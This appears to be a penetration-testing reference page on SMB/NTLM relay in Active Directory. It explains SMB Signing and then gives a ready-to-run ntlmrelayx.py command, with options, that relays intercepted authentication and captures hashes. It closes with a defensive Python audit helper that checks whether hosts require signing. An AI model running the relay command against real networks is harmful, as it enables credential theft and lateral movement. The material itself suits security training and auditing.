SMB Relay

Server Message Block (SMB) is a network protocol that is very popular within Active Directory environments; it allows computers to communicate and share resources, such as file shares.

SMB relay, sometimes referred to as NTLM relay, is a technique that is commonly used in tandem with network poisoning attacks once the attacker is an Adversary-in-the-Middle (AiTM). As the AiTM, the attacker can intercept authentication traffic being sent over SMB and relay it to other computers on the network that do not have SMB Signing enabled.

SMB Signing is a security feature that digitally signs the SMB packets exchanged between a client and a server. Because both sides verify the sender and the intended receiver of each signed packet, authentication traffic sent over SMB cannot be forwarded to anyone other than the intended receiver. SMB Signing has been enabled by default for Windows Servers since Windows Server 2008 and will be enabled by default for Windows computers beginning with Windows 11.

Exploit

Linux (Attacker)
ntlmrelayx.py -6 -wh [hostname].[domain] -tf [targets] -of creds/socks -socks -smb2support

OPTIONS
-6                           Listen On Both IPv4 AND IPv6
-wh [WPAD host]              Serve A WPAD File For Proxy Authentication Attack
-tf [targets]                Target Machines With SMB Signing Not Enabled To Relay Hashes To
-of [filename]               Output Filename For Intercepted Hashes
-socks                       Use A SOCKS Proxy For The Relayed Session (Port 1080)
-debug                       Enable Debug
-smb2support                 Enable SMBv2 Support

Impacket's ntlmrelayx.py relays intercepted SMB authentication traffic to computers on the network that have SMB Signing disabled. It works with authentication traffic obtained via both Responder and mitm6.
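An added audit helper for the defensive side of the above, not code from this page or from Impacket: it reads the SecurityMode field of an SMB2 NEGOTIATE response and treats a host as protected only when signing is required, because a host that merely has signing enabled (the default for workstations) still ends up on a relay target list. The probe() function and the sample_response() bytes are constructed for this example and are assumptions, not captures from any real host.

```python
import socket
import struct
import uuid

SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED  (MS-SMB2 2.2.4)
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
HDR = "<HHIHHIIQIIQ16s"    # SMB2 header fields after the 4-byte ProtocolId (60 bytes)

def parse_negotiate_response(msg: bytes) -> dict:
    """Return dialect and signing flags from a raw SMB2 NEGOTIATE response (no NetBIOS prefix)."""
    if len(msg) < 70 or msg[:4] != b"\xfeSMB" or struct.unpack_from("<H", msg, 12)[0] != 0:
        raise ValueError("not an SMB2 NEGOTIATE response")   # Command 0 = NEGOTIATE
    size, mode, dialect = struct.unpack_from("<HHH", msg, 64)  # body starts after 64-byte header
    if size != 65:
        raise ValueError("malformed NEGOTIATE response body")
    return {"dialect": dialect,
            "signing_enabled": bool(mode & SIGNING_ENABLED),
            "signing_required": bool(mode & SIGNING_REQUIRED)}

def relay_exposure(info: dict) -> str:
    """Only *required* signing stops relay; 'enabled' alone lets the peer opt out of signing."""
    return "protected" if info["signing_required"] else "relayable"

def build_negotiate_request() -> bytes:
    """Minimal SMB2 NEGOTIATE offering dialects 2.0.2 and 2.1 (no negotiate contexts needed)."""
    header = b"\xfeSMB" + struct.pack(HDR, 64, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHHI16sQHH", 36, 2, SIGNING_ENABLED, 0, 0, uuid.uuid4().bytes, 0,
                       0x0202, 0x0210)
    return struct.pack(">I", len(header) + len(body)) + header + body  # NetBIOS length prefix

def probe(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Send one NEGOTIATE to the host under audit and classify its signing policy."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        want = struct.unpack(">I", s.recv(4))[0] & 0x00FFFFFF  # NetBIOS session length
        data = b""
        while len(data) < want and (chunk := s.recv(want - len(data))):
            data += chunk
    info = parse_negotiate_response(data)
    info["exposure"] = relay_exposure(info)
    return info

def sample_response(mode: int) -> bytes:
    """Constructed (not captured) NEGOTIATE response carrying the given SecurityMode."""
    header = b"\xfeSMB" + struct.pack(HDR, 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, mode, 0x0210, 0, b"\0" * 16, 0, 65536,
                       65536, 65536, 0, 0, 128, 0, 0) + b"\0"
    return header + body
```

Running relay_exposure(parse_negotiate_response(sample_response(0x0003))) gives "protected" (the domain controller default), while 0x0001 gives "relayable"; probe() applies the same logic to a live host.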
